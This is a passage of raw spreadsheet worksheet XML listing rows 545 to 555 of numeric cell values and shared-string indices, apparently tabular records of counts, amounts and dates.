        <v>0</v>
      </c>
      <c r="Z545">
        <v>0</v>
      </c>
      <c r="AA545">
        <v>0</v>
      </c>
      <c r="AB545">
        <v>0</v>
      </c>
      <c r="AC545">
        <v>0</v>
      </c>
      <c r="AD545">
        <v>1</v>
      </c>
      <c r="AE545">
        <v>0</v>
      </c>
      <c r="AF545" t="s">
        <v>4378</v>
      </c>
      <c r="AG545">
        <v>20242</v>
      </c>
      <c r="AH545">
        <v>2</v>
      </c>
      <c r="AJ545">
        <v>53</v>
      </c>
      <c r="AK545" t="s">
        <v>1582</v>
      </c>
      <c r="AL545" t="s">
        <v>1583</v>
      </c>
      <c r="AM545" t="s">
        <v>4379</v>
      </c>
      <c r="AN545" t="s">
        <v>82</v>
      </c>
      <c r="AO545">
        <v>1976</v>
      </c>
      <c r="AP545" t="s">
        <v>4380</v>
      </c>
      <c r="AQ545">
        <v>85360701755</v>
      </c>
      <c r="AR545" t="s">
        <v>4381</v>
      </c>
      <c r="AS545" t="s">
        <v>71</v>
      </c>
      <c r="AT545" t="s">
        <v>86</v>
      </c>
      <c r="AU545">
        <v>26</v>
      </c>
      <c r="AV545">
        <v>1</v>
      </c>
      <c r="AW545">
        <v>0</v>
      </c>
      <c r="AX545">
        <v>0</v>
      </c>
      <c r="AY545">
        <v>19</v>
      </c>
      <c r="AZ545">
        <v>53</v>
      </c>
      <c r="BA545" t="s">
        <v>16935</v>
      </c>
      <c r="BB545" t="s">
        <v>15393</v>
      </c>
      <c r="BC545" t="s">
        <v>9536</v>
      </c>
      <c r="BD545" t="s">
        <v>11569</v>
      </c>
    </row>
    <row r="546" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A546">
        <v>1570</v>
      </c>
      <c r="B546" t="s">
        <v>4382</v>
      </c>
      <c r="C546" t="s">
        <v>2308</v>
      </c>
      <c r="D546" t="s">
        <v>4383</v>
      </c>
      <c r="E546" t="s">
        <v>111</v>
      </c>
      <c r="F546" t="s">
        <v>4384</v>
      </c>
      <c r="G546" s="1">
        <v>44281</v>
      </c>
      <c r="H546">
        <v>9244</v>
      </c>
      <c r="I546">
        <v>9244</v>
      </c>
      <c r="J546">
        <v>1</v>
      </c>
      <c r="K546">
        <v>0</v>
      </c>
      <c r="L546">
        <v>1</v>
      </c>
      <c r="M546">
        <v>0</v>
      </c>
      <c r="N546">
        <v>0</v>
      </c>
      <c r="O546">
        <v>0</v>
      </c>
      <c r="P546">
        <v>0</v>
      </c>
      <c r="Q546">
        <v>3</v>
      </c>
      <c r="R546">
        <v>2</v>
      </c>
      <c r="S546">
        <v>0</v>
      </c>
      <c r="T546">
        <v>1</v>
      </c>
      <c r="U546">
        <v>150000</v>
      </c>
      <c r="V546">
        <v>0</v>
      </c>
      <c r="W546">
        <v>4000</v>
      </c>
      <c r="X546">
        <v>0</v>
      </c>
      <c r="Y546">
        <v>0</v>
      </c>
      <c r="Z546">
        <v>0</v>
      </c>
      <c r="AA546">
        <v>0</v>
      </c>
      <c r="AB546">
        <v>1000</v>
      </c>
      <c r="AC546">
        <v>4000</v>
      </c>
      <c r="AD546">
        <v>0</v>
      </c>
      <c r="AE546">
        <v>2000</v>
      </c>
      <c r="AF546" t="s">
        <v>4385</v>
      </c>
      <c r="AG546">
        <v>98415</v>
      </c>
      <c r="AH546">
        <v>33</v>
      </c>
      <c r="AJ546">
        <v>485</v>
      </c>
      <c r="AK546" t="s">
        <v>2313</v>
      </c>
      <c r="AL546" t="s">
        <v>2314</v>
      </c>
      <c r="AM546" t="s">
        <v>4386</v>
      </c>
      <c r="AN546" t="s">
        <v>55</v>
      </c>
      <c r="AO546">
        <v>2019</v>
      </c>
      <c r="AP546" t="s">
        <v>4387</v>
      </c>
      <c r="AQ546" t="s">
        <v>4388</v>
      </c>
      <c r="AR546" t="s">
        <v>4385</v>
      </c>
      <c r="AS546" t="s">
        <v>71</v>
      </c>
      <c r="AT546" t="s">
        <v>86</v>
      </c>
      <c r="AU546">
        <v>24</v>
      </c>
      <c r="AV546">
        <v>0</v>
      </c>
      <c r="AW546">
        <v>5</v>
      </c>
      <c r="AX546">
        <v>5</v>
      </c>
      <c r="AY546">
        <v>2</v>
      </c>
      <c r="AZ546">
        <v>2</v>
      </c>
      <c r="BA546" t="s">
        <v>16939</v>
      </c>
      <c r="BB546" t="s">
        <v>15373</v>
      </c>
      <c r="BC546">
        <v>0</v>
      </c>
      <c r="BD546">
        <v>0</v>
      </c>
    </row>
    <row r="547" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A547">
        <v>1132</v>
      </c>
      <c r="B547" t="s">
        <v>4389</v>
      </c>
      <c r="C547" t="s">
        <v>47</v>
      </c>
      <c r="D547" t="s">
        <v>4390</v>
      </c>
      <c r="E547" t="s">
        <v>142</v>
      </c>
      <c r="F547" t="s">
        <v>4391</v>
      </c>
      <c r="G547" s="1">
        <v>44354</v>
      </c>
      <c r="H547">
        <v>9250</v>
      </c>
      <c r="I547">
        <v>9250</v>
      </c>
      <c r="J547">
        <v>3</v>
      </c>
      <c r="K547">
        <v>0</v>
      </c>
      <c r="L547">
        <v>3</v>
      </c>
      <c r="M547">
        <v>6</v>
      </c>
      <c r="N547">
        <v>0</v>
      </c>
      <c r="O547">
        <v>0</v>
      </c>
      <c r="P547">
        <v>0</v>
      </c>
      <c r="Q547">
        <v>0</v>
      </c>
      <c r="R547">
        <v>0</v>
      </c>
      <c r="S547">
        <v>4</v>
      </c>
      <c r="T547">
        <v>0</v>
      </c>
      <c r="U547">
        <v>2000000</v>
      </c>
      <c r="V547">
        <v>0</v>
      </c>
      <c r="W547">
        <v>15000</v>
      </c>
      <c r="X547">
        <v>20000</v>
      </c>
      <c r="Y547">
        <v>0</v>
      </c>
      <c r="Z547">
        <v>0</v>
      </c>
      <c r="AA547">
        <v>0</v>
      </c>
      <c r="AB547">
        <v>0</v>
      </c>
      <c r="AC547">
        <v>0</v>
      </c>
      <c r="AD547">
        <v>60000</v>
      </c>
      <c r="AE547">
        <v>0</v>
      </c>
      <c r="AF547" t="s">
        <v>4392</v>
      </c>
      <c r="AG547">
        <v>22532</v>
      </c>
      <c r="AH547">
        <v>2</v>
      </c>
      <c r="AJ547">
        <v>27</v>
      </c>
      <c r="AK547" t="s">
        <v>2607</v>
      </c>
      <c r="AL547" t="s">
        <v>2608</v>
      </c>
      <c r="AM547" t="s">
        <v>4393</v>
      </c>
      <c r="AN547" t="s">
        <v>82</v>
      </c>
      <c r="AO547">
        <v>2003</v>
      </c>
      <c r="AP547" t="s">
        <v>4394</v>
      </c>
      <c r="AQ547" t="s">
        <v>4395</v>
      </c>
      <c r="AR547" t="s">
        <v>4396</v>
      </c>
      <c r="AS547" t="s">
        <v>71</v>
      </c>
      <c r="AT547" t="s">
        <v>86</v>
      </c>
      <c r="AU547">
        <v>25</v>
      </c>
      <c r="AV547">
        <v>1</v>
      </c>
      <c r="AW547">
        <v>118</v>
      </c>
      <c r="AX547">
        <v>99</v>
      </c>
      <c r="AY547">
        <v>128</v>
      </c>
      <c r="AZ547">
        <v>55</v>
      </c>
      <c r="BA547">
        <v>0</v>
      </c>
      <c r="BB547">
        <v>0</v>
      </c>
      <c r="BC547">
        <v>0</v>
      </c>
      <c r="BD547" t="s">
        <v>13392</v>
      </c>
    </row>
    <row r="548" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A548">
        <v>1556</v>
      </c>
      <c r="B548" t="s">
        <v>4397</v>
      </c>
      <c r="C548" t="s">
        <v>157</v>
      </c>
      <c r="D548" t="s">
        <v>4398</v>
      </c>
      <c r="E548" t="s">
        <v>142</v>
      </c>
      <c r="F548" t="s">
        <v>4399</v>
      </c>
      <c r="G548" s="1">
        <v>44306</v>
      </c>
      <c r="H548">
        <v>9268</v>
      </c>
      <c r="I548">
        <v>9268</v>
      </c>
      <c r="J548">
        <v>1</v>
      </c>
      <c r="K548">
        <v>7</v>
      </c>
      <c r="L548">
        <v>1</v>
      </c>
      <c r="M548">
        <v>0</v>
      </c>
      <c r="N548">
        <v>0</v>
      </c>
      <c r="O548">
        <v>0</v>
      </c>
      <c r="P548">
        <v>0</v>
      </c>
      <c r="Q548">
        <v>0</v>
      </c>
      <c r="R548">
        <v>0</v>
      </c>
      <c r="S548">
        <v>0</v>
      </c>
      <c r="T548">
        <v>0</v>
      </c>
      <c r="U548">
        <v>10000</v>
      </c>
      <c r="V548">
        <v>70000</v>
      </c>
      <c r="W548">
        <v>1200</v>
      </c>
      <c r="X548">
        <v>0</v>
      </c>
      <c r="Y548">
        <v>0</v>
      </c>
      <c r="Z548">
        <v>0</v>
      </c>
      <c r="AA548">
        <v>0</v>
      </c>
      <c r="AB548">
        <v>0</v>
      </c>
      <c r="AC548">
        <v>0</v>
      </c>
      <c r="AD548">
        <v>0</v>
      </c>
      <c r="AE548">
        <v>0</v>
      </c>
      <c r="AF548" t="s">
        <v>4400</v>
      </c>
      <c r="AG548">
        <v>61219</v>
      </c>
      <c r="AH548">
        <v>16</v>
      </c>
      <c r="AJ548">
        <v>242</v>
      </c>
      <c r="AK548" t="s">
        <v>1894</v>
      </c>
      <c r="AL548" t="s">
        <v>1895</v>
      </c>
      <c r="AM548" t="s">
        <v>4401</v>
      </c>
      <c r="AN548" t="s">
        <v>82</v>
      </c>
      <c r="AO548">
        <v>1994</v>
      </c>
      <c r="AP548" t="s">
        <v>4402</v>
      </c>
      <c r="AQ548" t="s">
        <v>4403</v>
      </c>
      <c r="AR548" t="s">
        <v>4404</v>
      </c>
      <c r="AS548" t="s">
        <v>371</v>
      </c>
      <c r="AT548" t="s">
        <v>72</v>
      </c>
      <c r="AU548">
        <v>5</v>
      </c>
      <c r="AV548">
        <v>1</v>
      </c>
      <c r="AW548">
        <v>33</v>
      </c>
      <c r="AX548">
        <v>381</v>
      </c>
      <c r="AY548">
        <v>26</v>
      </c>
      <c r="AZ548">
        <v>17</v>
      </c>
      <c r="BA548">
        <v>0</v>
      </c>
      <c r="BB548" t="s">
        <v>15361</v>
      </c>
      <c r="BC548">
        <v>0</v>
      </c>
      <c r="BD548" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="549" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A549">
        <v>1489</v>
      </c>
      <c r="B549" t="s">
        <v>4405</v>
      </c>
      <c r="C549" t="s">
        <v>2308</v>
      </c>
      <c r="D549" t="s">
        <v>4406</v>
      </c>
      <c r="E549" t="s">
        <v>142</v>
      </c>
      <c r="F549" t="s">
        <v>1746</v>
      </c>
      <c r="G549" s="1">
        <v>44272</v>
      </c>
      <c r="H549">
        <v>9277</v>
      </c>
      <c r="I549">
        <v>9277</v>
      </c>
      <c r="J549">
        <v>1</v>
      </c>
      <c r="K549">
        <v>0</v>
      </c>
      <c r="L549">
        <v>0</v>
      </c>
      <c r="M549">
        <v>2</v>
      </c>
      <c r="N549">
        <v>0</v>
      </c>
      <c r="O549">
        <v>0</v>
      </c>
      <c r="P549">
        <v>0</v>
      </c>
      <c r="Q549">
        <v>3</v>
      </c>
      <c r="R549">
        <v>10</v>
      </c>
      <c r="S549">
        <v>0</v>
      </c>
      <c r="T549">
        <v>0</v>
      </c>
      <c r="U549">
        <v>100000</v>
      </c>
      <c r="V549">
        <v>0</v>
      </c>
      <c r="W549">
        <v>0</v>
      </c>
      <c r="X549">
        <v>3000</v>
      </c>
      <c r="Y549">
        <v>0</v>
      </c>
      <c r="Z549">
        <v>0</v>
      </c>
      <c r="AA549">
        <v>0</v>
      </c>
      <c r="AB549">
        <v>507</v>
      </c>
      <c r="AC549">
        <v>2520</v>
      </c>
      <c r="AD549">
        <v>0</v>
      </c>
      <c r="AE549">
        <v>0</v>
      </c>
      <c r="AF549" t="s">
        <v>2823</v>
      </c>
      <c r="AG549">
        <v>98414</v>
      </c>
      <c r="AH549">
        <v>33</v>
      </c>
      <c r="AJ549">
        <v>485</v>
      </c>
      <c r="AK549" t="s">
        <v>2313</v>
      </c>
      <c r="AL549" t="s">
        <v>2314</v>
      </c>
      <c r="AM549" t="s">
        <v>4407</v>
      </c>
      <c r="AN549" t="s">
        <v>55</v>
      </c>
      <c r="AO549">
        <v>1970</v>
      </c>
      <c r="AP549" t="s">
        <v>4408</v>
      </c>
      <c r="AQ549" t="s">
        <v>4409</v>
      </c>
      <c r="AR549" t="s">
        <v>2827</v>
      </c>
      <c r="AS549" t="s">
        <v>71</v>
      </c>
      <c r="AT549" t="s">
        <v>58</v>
      </c>
      <c r="AU549">
        <v>25</v>
      </c>
      <c r="AV549">
        <v>1</v>
      </c>
      <c r="AW549">
        <v>22</v>
      </c>
      <c r="AX549">
        <v>25</v>
      </c>
      <c r="AY549">
        <v>7</v>
      </c>
      <c r="AZ549">
        <v>3</v>
      </c>
      <c r="BA549" t="s">
        <v>16911</v>
      </c>
      <c r="BB549" t="s">
        <v>15316</v>
      </c>
      <c r="BC549" t="s">
        <v>13281</v>
      </c>
      <c r="BD549" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="550" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A550">
        <v>1266</v>
      </c>
      <c r="B550" t="s">
        <v>4410</v>
      </c>
      <c r="C550" t="s">
        <v>168</v>
      </c>
      <c r="D550" t="s">
        <v>4411</v>
      </c>
      <c r="E550" t="s">
        <v>142</v>
      </c>
      <c r="F550" t="s">
        <v>4412</v>
      </c>
      <c r="G550" s="1">
        <v>44354</v>
      </c>
      <c r="H550">
        <v>9283</v>
      </c>
      <c r="I550">
        <v>9283</v>
      </c>
      <c r="J550">
        <v>6</v>
      </c>
      <c r="K550">
        <v>3</v>
      </c>
      <c r="L550">
        <v>2</v>
      </c>
      <c r="M550">
        <v>0</v>
      </c>
      <c r="N550">
        <v>0</v>
      </c>
      <c r="O550">
        <v>0</v>
      </c>
      <c r="P550">
        <v>0</v>
      </c>
      <c r="Q550">
        <v>0</v>
      </c>
      <c r="R550">
        <v>0</v>
      </c>
      <c r="S550">
        <v>0</v>
      </c>
      <c r="T550">
        <v>0</v>
      </c>
      <c r="U550">
        <v>9000</v>
      </c>
      <c r="V550">
        <v>300000</v>
      </c>
      <c r="W550">
        <v>4000</v>
      </c>
      <c r="X550">
        <v>0</v>
      </c>
      <c r="Y550">
        <v>0</v>
      </c>
      <c r="Z550">
        <v>0</v>
      </c>
      <c r="AA550">
        <v>0</v>
      </c>
      <c r="AB550">
        <v>0</v>
      </c>
      <c r="AC550">
        <v>0</v>
      </c>
      <c r="AD550">
        <v>0</v>
      </c>
      <c r="AE550">
        <v>0</v>
      </c>
      <c r="AF550" t="s">
        <v>4413</v>
      </c>
      <c r="AG550">
        <v>45112</v>
      </c>
      <c r="AH550">
        <v>13</v>
      </c>
      <c r="AJ550">
        <v>182</v>
      </c>
      <c r="AK550" t="s">
        <v>4250</v>
      </c>
      <c r="AL550" t="s">
        <v>4414</v>
      </c>
      <c r="AM550" t="s">
        <v>4415</v>
      </c>
      <c r="AN550" t="s">
        <v>55</v>
      </c>
      <c r="AO550">
        <v>1997</v>
      </c>
      <c r="AP550" t="s">
        <v>4416</v>
      </c>
      <c r="AQ550" t="s">
        <v>4417</v>
      </c>
      <c r="AR550" t="s">
        <v>4418</v>
      </c>
      <c r="AS550" t="s">
        <v>71</v>
      </c>
      <c r="AT550" t="s">
        <v>58</v>
      </c>
      <c r="AU550">
        <v>25</v>
      </c>
      <c r="AV550">
        <v>0</v>
      </c>
      <c r="AW550">
        <v>10</v>
      </c>
      <c r="AX550">
        <v>32</v>
      </c>
      <c r="AY550">
        <v>26</v>
      </c>
      <c r="AZ550">
        <v>23</v>
      </c>
      <c r="BA550">
        <v>0</v>
      </c>
      <c r="BB550">
        <v>0</v>
      </c>
      <c r="BC550">
        <v>0</v>
      </c>
      <c r="BD550" t="s">
        <v>13254</v>
      </c>
    </row>
    <row r="551" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A551">
        <v>1278</v>
      </c>
      <c r="B551" t="s">
        <v>4419</v>
      </c>
      <c r="C551" t="s">
        <v>47</v>
      </c>
      <c r="D551" t="s">
        <v>4420</v>
      </c>
      <c r="E551" t="s">
        <v>111</v>
      </c>
      <c r="F551" t="s">
        <v>4421</v>
      </c>
      <c r="G551" s="1">
        <v>44299</v>
      </c>
      <c r="H551">
        <v>9307</v>
      </c>
      <c r="I551">
        <v>9307</v>
      </c>
      <c r="J551">
        <v>1</v>
      </c>
      <c r="K551">
        <v>0</v>
      </c>
      <c r="L551">
        <v>3</v>
      </c>
      <c r="M551">
        <v>4</v>
      </c>
      <c r="N551">
        <v>1000</v>
      </c>
      <c r="O551">
        <v>0</v>
      </c>
      <c r="P551">
        <v>0</v>
      </c>
      <c r="Q551">
        <v>2</v>
      </c>
      <c r="R551">
        <v>0</v>
      </c>
      <c r="S551">
        <v>0</v>
      </c>
      <c r="T551">
        <v>0</v>
      </c>
      <c r="U551">
        <v>50000</v>
      </c>
      <c r="V551">
        <v>0</v>
      </c>
      <c r="W551">
        <v>900</v>
      </c>
      <c r="X551">
        <v>600</v>
      </c>
      <c r="Y551">
        <v>0</v>
      </c>
      <c r="Z551">
        <v>0</v>
      </c>
      <c r="AA551">
        <v>0</v>
      </c>
      <c r="AB551">
        <v>1400</v>
      </c>
      <c r="AC551">
        <v>0</v>
      </c>
      <c r="AD551">
        <v>0</v>
      </c>
      <c r="AE551">
        <v>0</v>
      </c>
      <c r="AF551" t="s">
        <v>4422</v>
      </c>
      <c r="AG551">
        <v>20987</v>
      </c>
      <c r="AH551">
        <v>2</v>
      </c>
      <c r="AJ551">
        <v>41</v>
      </c>
      <c r="AK551" t="s">
        <v>4423</v>
      </c>
      <c r="AL551" t="s">
        <v>4424</v>
      </c>
      <c r="AM551" t="s">
        <v>4425</v>
      </c>
      <c r="AN551" t="s">
        <v>55</v>
      </c>
      <c r="AO551">
        <v>1998</v>
      </c>
      <c r="AP551" t="s">
        <v>4426</v>
      </c>
      <c r="AQ551" t="s">
        <v>4427</v>
      </c>
      <c r="AR551" t="s">
        <v>4422</v>
      </c>
      <c r="AS551" t="s">
        <v>71</v>
      </c>
      <c r="AT551" t="s">
        <v>58</v>
      </c>
      <c r="AU551">
        <v>20</v>
      </c>
      <c r="AV551">
        <v>2</v>
      </c>
      <c r="AW551">
        <v>0</v>
      </c>
      <c r="AX551">
        <v>0</v>
      </c>
      <c r="AY551">
        <v>1002</v>
      </c>
      <c r="AZ551">
        <v>491</v>
      </c>
      <c r="BA551" t="s">
        <v>16750</v>
      </c>
      <c r="BB551" t="s">
        <v>15170</v>
      </c>
      <c r="BC551">
        <v>0</v>
      </c>
      <c r="BD551" t="s">
        <v>13450</v>
      </c>
    </row>
    <row r="552" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A552">
        <v>1676</v>
      </c>
      <c r="B552" t="s">
        <v>4428</v>
      </c>
      <c r="C552" t="s">
        <v>477</v>
      </c>
      <c r="D552" t="s">
        <v>4429</v>
      </c>
      <c r="E552" t="s">
        <v>111</v>
      </c>
      <c r="F552" t="s">
        <v>4430</v>
      </c>
      <c r="G552" s="1">
        <v>44302</v>
      </c>
      <c r="H552">
        <v>9383</v>
      </c>
      <c r="I552">
        <v>9383</v>
      </c>
      <c r="J552">
        <v>1</v>
      </c>
      <c r="K552">
        <v>1</v>
      </c>
      <c r="L552">
        <v>2</v>
      </c>
      <c r="M552">
        <v>0</v>
      </c>
      <c r="N552">
        <v>0</v>
      </c>
      <c r="O552">
        <v>0</v>
      </c>
      <c r="P552">
        <v>0</v>
      </c>
      <c r="Q552">
        <v>0</v>
      </c>
      <c r="R552">
        <v>8</v>
      </c>
      <c r="S552">
        <v>0</v>
      </c>
      <c r="T552">
        <v>0</v>
      </c>
      <c r="U552">
        <v>30000</v>
      </c>
      <c r="V552">
        <v>2500</v>
      </c>
      <c r="W552">
        <v>10000</v>
      </c>
      <c r="X552">
        <v>0</v>
      </c>
      <c r="Y552">
        <v>0</v>
      </c>
      <c r="Z552">
        <v>0</v>
      </c>
      <c r="AA552">
        <v>0</v>
      </c>
      <c r="AB552">
        <v>0</v>
      </c>
      <c r="AC552">
        <v>8000</v>
      </c>
      <c r="AD552">
        <v>0</v>
      </c>
      <c r="AE552">
        <v>0</v>
      </c>
      <c r="AF552" t="s">
        <v>4431</v>
      </c>
      <c r="AG552">
        <v>95885</v>
      </c>
      <c r="AH552">
        <v>29</v>
      </c>
      <c r="AJ552">
        <v>374</v>
      </c>
      <c r="AK552" t="s">
        <v>4432</v>
      </c>
      <c r="AL552" t="s">
        <v>4433</v>
      </c>
      <c r="AM552" t="s">
        <v>4434</v>
      </c>
      <c r="AN552" t="s">
        <v>55</v>
      </c>
      <c r="AO552">
        <v>2018</v>
      </c>
      <c r="AP552">
        <v>81311344894</v>
      </c>
      <c r="AQ552" t="s">
        <v>4435</v>
      </c>
      <c r="AR552" t="s">
        <v>4435</v>
      </c>
      <c r="AS552" t="s">
        <v>71</v>
      </c>
      <c r="AT552" t="s">
        <v>58</v>
      </c>
      <c r="AU552">
        <v>25</v>
      </c>
      <c r="AV552">
        <v>1</v>
      </c>
      <c r="AW552">
        <v>12</v>
      </c>
      <c r="AX552">
        <v>23</v>
      </c>
      <c r="AY552">
        <v>2</v>
      </c>
      <c r="AZ552">
        <v>0</v>
      </c>
      <c r="BA552" t="s">
        <v>16968</v>
      </c>
      <c r="BB552">
        <v>0</v>
      </c>
      <c r="BC552" t="s">
        <v>9550</v>
      </c>
      <c r="BD552" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="553" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A553">
        <v>1393</v>
      </c>
      <c r="B553" t="s">
        <v>4436</v>
      </c>
      <c r="C553" t="s">
        <v>99</v>
      </c>
      <c r="D553" t="s">
        <v>4437</v>
      </c>
      <c r="E553" t="s">
        <v>142</v>
      </c>
      <c r="F553" t="s">
        <v>519</v>
      </c>
      <c r="G553" s="1">
        <v>44315</v>
      </c>
      <c r="H553">
        <v>9398</v>
      </c>
      <c r="I553">
        <v>9398</v>
      </c>
      <c r="J553">
        <v>1</v>
      </c>
      <c r="K553">
        <v>0</v>
      </c>
      <c r="L553">
        <v>0</v>
      </c>
      <c r="M553">
        <v>0</v>
      </c>
      <c r="N553">
        <v>0</v>
      </c>
      <c r="O553">
        <v>0</v>
      </c>
      <c r="P553">
        <v>0</v>
      </c>
      <c r="Q553">
        <v>0</v>
      </c>
      <c r="R553">
        <v>0</v>
      </c>
      <c r="S553">
        <v>0</v>
      </c>
      <c r="T553">
        <v>0</v>
      </c>
      <c r="U553">
        <v>150000</v>
      </c>
      <c r="V553">
        <v>0</v>
      </c>
      <c r="W553">
        <v>0</v>
      </c>
      <c r="X553">
        <v>0</v>
      </c>
      <c r="Y553">
        <v>0</v>
      </c>
      <c r="Z553">
        <v>0</v>
      </c>
      <c r="AA553">
        <v>0</v>
      </c>
      <c r="AB553">
        <v>0</v>
      </c>
      <c r="AC553">
        <v>0</v>
      </c>
      <c r="AD553">
        <v>0</v>
      </c>
      <c r="AE553">
        <v>0</v>
      </c>
      <c r="AF553" t="s">
        <v>4438</v>
      </c>
      <c r="AG553">
        <v>14440</v>
      </c>
      <c r="AH553">
        <v>12</v>
      </c>
      <c r="AJ553">
        <v>160</v>
      </c>
      <c r="AK553" t="s">
        <v>396</v>
      </c>
      <c r="AL553" t="s">
        <v>114</v>
      </c>
      <c r="AM553" t="s">
        <v>4439</v>
      </c>
      <c r="AN553" t="s">
        <v>55</v>
      </c>
      <c r="AO553">
        <v>1999</v>
      </c>
      <c r="AP553" t="s">
        <v>4440</v>
      </c>
      <c r="AQ553" t="s">
        <v>4441</v>
      </c>
      <c r="AR553" t="s">
        <v>4442</v>
      </c>
      <c r="AS553" t="s">
        <v>179</v>
      </c>
      <c r="AT553" t="s">
        <v>58</v>
      </c>
      <c r="AU553">
        <v>25</v>
      </c>
      <c r="AV553">
        <v>1</v>
      </c>
      <c r="AW553">
        <v>6</v>
      </c>
      <c r="AX553">
        <v>0</v>
      </c>
      <c r="AY553">
        <v>4</v>
      </c>
      <c r="AZ553">
        <v>2</v>
      </c>
      <c r="BA553" t="s">
        <v>16870</v>
      </c>
      <c r="BB553" t="s">
        <v>15247</v>
      </c>
      <c r="BC553" t="s">
        <v>13377</v>
      </c>
      <c r="BD553">
        <v>0</v>
      </c>
    </row>
    <row r="554" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A554">
        <v>1285</v>
      </c>
      <c r="B554" t="s">
        <v>4443</v>
      </c>
      <c r="C554" t="s">
        <v>318</v>
      </c>
      <c r="D554" t="s">
        <v>4444</v>
      </c>
      <c r="E554" t="s">
        <v>363</v>
      </c>
      <c r="F554" t="s">
        <v>364</v>
      </c>
      <c r="G554" s="1">
        <v>44281</v>
      </c>
      <c r="H554">
        <v>9405</v>
      </c>
      <c r="I554">
        <v>9405</v>
      </c>
      <c r="J554">
        <v>0</v>
      </c>
      <c r="K554">
        <v>0</v>
      </c>
      <c r="L554">
        <v>0</v>
      </c>
      <c r="M554">
        <v>0</v>
      </c>
      <c r="N554">
        <v>0</v>
      </c>
      <c r="O554">
        <v>0</v>
      </c>
      <c r="P554">
        <v>0</v>
      </c>
      <c r="Q554">
        <v>0</v>
      </c>
      <c r="R554">
        <v>0</v>
      </c>
      <c r="S554">
        <v>0</v>
      </c>
      <c r="T554">
        <v>1</v>
      </c>
      <c r="U554">
        <v>0</v>
      </c>
      <c r="V554">
        <v>0</v>
      </c>
      <c r="W554">
        <v>0</v>
      </c>
      <c r="X554">
        <v>0</v>
      </c>
      <c r="Y554">
        <v>0</v>
      </c>
      <c r="Z554">
        <v>0</v>
      </c>
      <c r="AA554">
        <v>0</v>
      </c>
      <c r="AB554">
        <v>0</v>
      </c>
      <c r="AC554">
        <v>0</v>
      </c>
      <c r="AD554">
        <v>0</v>
      </c>
      <c r="AE554">
        <v>200000</v>
      </c>
      <c r="AF554" t="s">
        <v>4445</v>
      </c>
      <c r="AG554">
        <v>0</v>
      </c>
      <c r="AH554">
        <v>26</v>
      </c>
      <c r="AJ554">
        <v>406</v>
      </c>
      <c r="AK554" t="s">
        <v>647</v>
      </c>
      <c r="AL554" t="s">
        <v>4446</v>
      </c>
      <c r="AM554" t="s">
        <v>4447</v>
      </c>
      <c r="AN554" t="s">
        <v>82</v>
      </c>
      <c r="AO554">
        <v>2015</v>
      </c>
      <c r="AP554">
        <v>3199009059</v>
      </c>
      <c r="AQ554" t="s">
        <v>4448</v>
      </c>
      <c r="AR554" t="s">
        <v>4445</v>
      </c>
      <c r="AS554" t="s">
        <v>371</v>
      </c>
      <c r="AT554" t="s">
        <v>72</v>
      </c>
      <c r="AU554">
        <v>28</v>
      </c>
      <c r="AV554">
        <v>1</v>
      </c>
      <c r="AW554">
        <v>5</v>
      </c>
      <c r="AX554">
        <v>0</v>
      </c>
      <c r="AY554">
        <v>4</v>
      </c>
      <c r="AZ554">
        <v>1</v>
      </c>
      <c r="BA554" t="s">
        <v>16838</v>
      </c>
      <c r="BB554" t="s">
        <v>15174</v>
      </c>
      <c r="BC554" t="s">
        <v>9536</v>
      </c>
      <c r="BD554" t="s">
        <v>13300</v>
      </c>
    </row>
    <row r="555" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A555">
        <v>1699</v>
      </c>
      <c r="B555" t="s">
        <v>4449</v>
      </c>
      <c r="C555" t="s">
        <v>318</v>
      </c>
      <c r="D555" t="s">
        <v>4450</v>
      </c>
      <c r="E555" t="s">
        <v>111</v>
      </c>
      <c r="F555" t="s">
        <v>4451</v>
      </c>
      <c r="G555" s="1">
        <v>44307</v>
      </c>
      <c r="H555">
        <v>9492</v>
      </c>
      <c r="I555">
        <v>9492</v>
      </c>
      <c r="J555">
        <v>2</v>
      </c>
      <c r="K555">
        <v>1</v>
      </c>
      <c r="L555">
        <v>2</v>
      </c>
      <c r="M555">
        <v>1</v>
      </c>
      <c r="N555">
        <v>0</v>
      </c>
      <c r="O555">
        <v>0</v>
      </c>
      <c r="P555">
        <v>0</v>
      </c>
      <c r="Q555">
        <v>2</v>
      </c>
      <c r="R555">
        <v>22</v>
      </c>
      <c r="S555">
        <v>1</v>
      </c>
      <c r="T555">
        <v>2</v>
      </c>
      <c r="U555">
        <v>120000</v>
      </c>
      <c r="V555">
        <v>1400</v>
      </c>
      <c r="W555">
        <v>3000</v>
      </c>
      <c r="X555">
        <v>1200</v>
      </c>
      <c r="Y555">
        <v>0</v>
      </c>
      <c r="Z555">
        <v>0</v>
      </c>
      <c r="AA555">
        <v>0</v>
      </c>
      <c r="AB555">
        <v>150</v>
      </c>
      <c r="AC555">
        <v>8800</v>
      </c>
      <c r="AD555">
        <v>1</v>
      </c>
      <c r="AE555">
        <v>4000</v>
      </c>
      <c r="AF555" t="s">
        <v>4452</v>
      </c>
      <c r="AG555">
        <v>90241</v>
      </c>
      <c r="AH555">
        <v>26</v>
      </c>
      <c r="AJ555">
        <v>420</v>
      </c>
      <c r="AK555" t="s">
        <v>331</v>
      </c>
      <c r="AL555" t="s">
        <v>332</v>
      </c>
      <c r="AM555" t="s">
        <v>4453</v>
      </c>
      <c r="AN555" t="s">
        <v>55</v>
      </c>
      <c r="AO555">
        <v>2015</v>
      </c>
      <c r="AP555">
        <v>8558880788</v>
      </c>
      <c r="AQ555" t="s">
        <v>4454</v>
      </c>
      <c r="AR555" t="s">
        <v>4455</v>
      </c>
      <c r="AS555" t="s">
        <v>71</v>
      </c>
      <c r="AT555" t="s">
        <v>58</v>
      </c>
      <c r="AU555">
        <v>25</v>
      </c>
      <c r="AV555">
        <v>1</v>
      </c>
      <c r="AW555">
        <v>3</v>
      </c>
      <c r="AX555">
        <v>0</v>
      </c>
      <c r="AY555">
        <v>18</v>
      </c>
      <c r="AZ555">
        <v>29</v>
      </c>
